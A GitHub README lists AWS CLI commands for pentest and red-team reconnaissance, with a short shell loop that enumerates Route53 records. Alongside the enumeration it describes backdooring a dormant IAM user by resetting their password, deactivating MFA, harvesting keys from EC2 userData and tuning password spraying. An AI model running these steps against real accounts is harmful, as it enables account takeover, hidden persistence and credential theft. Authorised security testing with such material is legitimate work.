Skip to content
/ AWS-Essentails-for-Pentest Public

List of AWS commands which can help gather information about the target. Helpful during pentests and red team engagement.

8 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

0xdeadpool/AWS-Essentails-for-Pentest

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
README.md
README.md
 
 

Repository files navigation

AWS-Essentials-for-Pentest

List of AWS commands which can help gather information about the target. Helpful during pentests and red team engagements to acheive higher privileges or gather information about the network.

Get list of all users:

aws iam list-users

Search for the keyword PasswordLastUsed. This will give us an idea who hasnt logged in for the longest time. If the current AWS keys have administrative privileges or access to ch we can use that to backdoor this user account and stay hidden in the AWS network.

Get password policy:

aws iam get-account-password-policy

This gives a basic idea on what the password policy looks like. Can be used to fine tune password sparying attacks.

Change the oldest user’s password according to policy

aws iam update-login-profile --user-name <Name> --password <password>

Get account alias name to login to UI:

aws iam list-account-aliases

Login link: https://.signin.aws.amazon.com/console

Get MFA details for user:

aws iam list-mfa-devices --user-name <name>

Remove MFA:

aws iam deactivate-mfa-device --user-name Bob --serial-number

Get UserData from running EC2 instance based on instance ID:

aws ec2 describe-instance-attribute --instance-id <instance-id> --attribute userData

This can sometime give sensitive information like AWS keys or access tokens which can be used to elevate privileges.

Get Route53 Hosted Zones:

aws route53 list-hosted-zones

This can give a list of domains and subdomains which can be useful.

Get Route53 Resource Records - Useful for finding subdomains

aws route53 list-resource-record-sets --hosted-zone-id <zone>

Script to find Hosted Zone and records

aws route53 list-hosted-zones | grep Id | cut -d'"' -f 4 | cut -d'/' -f 3 > route.53.hosted.zones

for i in $(cat route.53.hosted.zones); do aws route53 list-resource-record-sets --hosted-zone-id $i | grep  "\"Name\"" | cut -d '"' -f 4 > $i.records.list; done

for i in $(ls *.records.list); do mv $i $(head -n 1 $i)record.list; done

mkdir domain_list

mv *.record.list domain_list

Get SSM managed instance list

aws ssm describe-instance-information

Get list of AWS SSM managed instances list. This will help us run commands or gain SSH session without the need of private key.

About

List of AWS commands which can help gather information about the target. Helpful during pentests and red team engagement.

Resources

Readme
Activity

Stars

8 stars

Watchers

2 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published